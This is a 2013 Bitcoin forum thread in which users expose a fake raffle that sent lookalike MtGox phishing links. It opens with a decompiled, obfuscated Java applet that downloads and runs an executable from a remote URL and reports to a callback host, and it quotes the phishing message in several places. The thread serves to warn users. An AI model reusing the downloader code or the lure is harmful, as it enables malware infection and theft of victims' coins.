      this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))] = this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))].replaceAll((this.CCC[1] + this.CCC[1].concat("5").concat("$").concat("4")).replaceAll("[".concat("0") + "-".concat("9") + "]", "").toString(), "");
      this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))] = (this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))] + this.CCC[0] + this.CCC[0] + this.CCC[2].replaceAll(new StringBuilder().append("[".concat("0")).append("-".concat("9")).append("]").toString(), "") + ".exe");

      if (IFK(new StringBuffer("exe.WMI/d752e7e16bb67fa737fc9a3450c9243b9f10017b/62311174/daolnwod/ten.tsohgr//:ptth").reverse().toString(), this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))], false, getAppletContext(), getDocumentBase()) == true)
        System.exit(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"));
    }
    catch (Exception localException) {
      System.exit(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"));
    }
  }

  public boolean IFK(String paramString1, String paramString2, boolean paramBoolean, AppletContext paramAppletContext, URL paramURL) {
    try {
      FileOutputStream localFileOutputStream = new FileOutputStream(paramString2);
      localFileOutputStream.getChannel().transferFrom(Channels.newChannel(new URL(paramString1).openStream()), 0L, 16777216L);
      localFileOutputStream.close();

      if (Runtime.getRuntime().exec(this.AAA[(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"))]) != null) {
        new URL("1h3t3t3p3:3/3/3w3w3w3.3s3u3p3e3r3-3t7".replaceAll(new StringBuilder().append("[".concat("0")).append("-".concat("9")).append("]").toString(), "") + "1r3a3c3k3e3r3.3n3e3t3/3w7".replaceAll(new StringBuilder().append("[".concat("0")).append("-".concat("9")).append("]").toString(), "").concat(new StringBuilder().append("1t3f3/3c3a3l3l3b3a3c3k3=3g3e3t7".replaceAll(new StringBuilder().append("[".concat("0")).append("-".concat("9")).append("]").toString(), "")).append("1i3p3.3j3s3.3p3h3p3?3u3s7".replaceAll(new StringBuilder().append("[".concat("0")).append("-".concat("9")).append("]").toString(), "")).toString()).concat(new StringBuilder().append("1e3r3n3a3m3e3=7".replaceAll(new StringBuilder().append("[".concat("0")).append("-".concat("9")).append("]").toString(), "")).append("bongwater").append("&website=").toString()) + paramURL.toString().concat("&type=1&download=").concat(new StringBuilder().append(new StringBuffer("exe.WMI/d752e7e16bb67fa737fc9a3450c9243b9f10017b/62311174/daolnwod/ten.tsohgr//:ptth").reverse().toString()).append("&").append("exploit=0").toString())).openStream();

        if (paramBoolean == true) {
          paramAppletContext.showDocument(new URL(""), "");
        }
      }
      else if (paramBoolean == true) {
        paramAppletContext.showDocument(new URL(""), "");
      }

      System.exit(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"));
    } catch (Exception localException) {
      System.exit(Integer.parseInt("0") + Integer.parseInt("3") + Integer.parseInt("5") - Integer.parseInt("2") - Integer.parseInt("3") - Integer.parseInt("3"));
    }
    return true;
  }
}


Virustotal Scan of a Executable that tries to download:
https://www.virustotal.com/es/file/79dabdcac50bdb5219906cfee9e1dd12ddc67106cd34867c08cfe14c8561ac83/analysis/1372922774/
danattacker
full member
Activity: 121
Merit: 100
Re: Pishing scammer! legitnick!
July 04, 2013, 03:18:52 AM
#12
Yep, I got the same PM a little while ago. Noticed the jacked up htpps and then checked the link and noticed it was mtqox and not mtgox. I never clicked on the link. Did a little check on google and saw the java.jar and decided to not even attempt to go to the site.
far004
newbie
Activity: 54
Merit: 0
Re: Pishing scammer! legitnick!
July 04, 2013, 03:08:25 AM
#11
Quote from: buysellbitcoin on July 04, 2013, 02:58:51 AM
Quote from: far004 on July 04, 2013, 02:55:16 AM
Can someone please put a "SCAMMER" tag in front of his name? Maybe ban him as well???

You can update his trust rating at least for the moment Smiley

Cheers

Done.
freedomno1
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
Re: Pishing scammer! legitnick!
July 04, 2013, 02:59:09 AM
#10
Anyways I'm crediting this game to anyroll
Goes to delete other scam warning
iAndroid mind spelling phishing correct Smiley
Scam Warning Anyroll 2.0 Legitnick 5 BTC Draw

GAH I cannot delete topics on this board!
Mumble Request delete of mine to prevent duplication should have looked again Wink

Please report all PM's to speed up delete Smiley
buysellbitcoin
legendary
Activity: 1105
Merit: 1001
https://www.zebpay.com
Re: Pishing scammer! legitnick!
July 04, 2013, 02:58:51 AM
#9
Quote from: far004 on July 04, 2013, 02:55:16 AM
Can someone please put a "SCAMMER" tag in front of his name? Maybe ban him as well???

You can update his trust rating at least for the moment Smiley

Cheers
buysellbitcoin
legendary
Activity: 1105
Merit: 1001
https://www.zebpay.com
Re: Pishing scammer! legitnick!
July 04, 2013, 02:57:25 AM
#8
So at least now I learned a lesson Smiley

First that guy who was giving btc-e phishing links to wieners.. Now this guy Smiley

Why I still think, some one is willing to give away his Bitcoins like this Tongue

Lesson learned, move on..

@legitnick, enjoy BTC, Paswords ( or  whatever your .com file does ) you get from newbies...

Cheers
freedomno1
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
Re: Pishing scammer! legitnick!
July 04, 2013, 02:57:16 AM
#7
Re posting exact

Warning
Thread locked
Mailed to mods for verification
https://bitcointalksearch.org/topic/m.2612378
Url links to mtqox with a q

Winners are as follows:
candoo
Freedomno1
Ares
Palantir13
dwolfman
Obama
juronimo
albert speer
hurro
bachelor


Congratulations on becoming one of the winners!   
Below is a mtgox redeemable code loaded with .5 btc.  I picked these up before mtgox cancelled code creation, so you can still redeem them. 
I will post code and mtgox link below.

Code: 5kx9d0d67ce4jr984xbe0

htpps://mtgox.com/redeem-code.htm/

Please post on the Winner announcement thread once you get your coins. Thanks and enjoy your extra coins!
Evolyn
sr. member
Activity: 376
Merit: 312
Can you say... nighty-night?
Re: Pishing scammer! legitnick!
July 04, 2013, 02:55:56 AM
#6
hey, the real winners are:

Quote from: legitnick on July 04, 2013, 06:25:07 AM
Winners are as follows:
Evolyn
claycoins
Elwar
A Meteorite
Jgguy
Obama
juronimo
albert speer
hurro
bachelor

got the same scam pm (just five other winners).

stupid scammer :/
far004
newbie
Activity: 54
Merit: 0
Re: Pishing scammer! legitnick!
July 04, 2013, 02:55:16 AM
#5
He also sent me a message, obviously I had won as well...

Quote from: legitnick on July 04, 2013, 06:13:25 AM
Winners are as follows:
akabmikua
fishy
George900
Jdumond
far004
Obama
juronimo
albert speer
hurro
bachelor

The link pointed to tries to open a Java applet, which asks for "unrestricted access". In short, DO NOT allow unrestricted access to that site. Can someone please put a "SCAMMER" tag in front of his name? Maybe ban him as well???
freedomno1
legendary
Activity: 1806
Merit: 1090
Learning the troll avoidance button :)
Re: Pishing scammer! legitnick!
July 04, 2013, 02:53:47 AM
#4
Beat me by a minute lol verifying I'll keep the second thread up but credits yours as first
https://bitcointalksearch.org/topic/m.2612378
Winners are as follows:
candoo
Freedomno1
Ares
Palantir13
dwolfman
Obama
juronimo
albert speer
hurro
bachelor


Congratulations on becoming one of the winners!  
Below is a mtgox redeemable code loaded with .5 btc.  I picked these up before mtgox cancelled code creation, so you can still redeem them.  
I will post code and mtgox link below.

Code: 5kx9d0d67ce4jr984xbe0

htpps://mtgox.com/redeem-code.htm/

Please post on the Winner announcement thread once you get your coins. Thanks and enjoy your extra coins!
buysellbitcoin
legendary
Activity: 1105
Merit: 1001
https://www.zebpay.com
Re: Pishing scammer! legitnick!
July 04, 2013, 02:52:12 AM
#3
lol  Grin

Quote from: legitnick on 03-07-2013, 10:39:38
Winners are as follows:
Sebastienurbain
halfawake
grm203
stelmoi
buysellbitcoin
Obama
juronimo
albert speer
hurro
bachelor


Congratulations on becoming one of the winners!   
Below is a mtgox redeemable code loaded with .5 btc.  I picked these up before mtgox cancelled code creation, so you can still redeem them. 
I've uploaded the codes, password to open .com file is legitnickiscool

htpps://mtgox.com/redeem-code.htm/

Please post on the Winner announcement thread once you get your coins. Thanks and enjoy your extra coins!
🏰 TradeFortress 🏰
vip
Activity: 1316
Merit: 1043
👻
Re: Pishing scammer! legitnick!
July 04, 2013, 02:51:00 AM
#2
Quote
*Note to Mods* Approved by John K. to keep in General Discussion.

Great idea Roll Eyes
iANDROID
full member
Activity: 182
Merit: 100
Swiss Money all around me!
Re: Pishing scammer! legitnick!
July 04, 2013, 02:45:42 AM
#1
This guy was doing a free raffle up there:

https://bitcointalksearch.org/topic/5-bitcoin-independence-day-raffle-scam-phish-246400

He send me a private message today:
Quote from: acne on July 03, 2013, 01:39:38 AM
Winners are as follows:
iAndroid
hashkey
danieldaniel
runam0k
BigBitz
Obama
juronimo
albert speer
hurro
bachelor


Congratulations on becoming one of the winners!  
Below is a mtgox redeemable code loaded with .5 btc.  I picked these up before mtgox cancelled code creation, so you can still redeem them. 
I will post code and mtgox link below.

Code: 5kx9d0d67ce4jr984xbe0

htpps://mtgox.com/redeem-code.htm/

Please post on the Winner announcement thread once you get your coins. Thanks and enjoy your extra coins!


As you can see this is not the URL of MtGox. He made the link to MtQox or something like this.
The link of HIS quote is going nowhere?
Code is not usable on MtGox.
Bitcoin Forum>Economy>Trading Discussion>Scam Accusations
Jump to: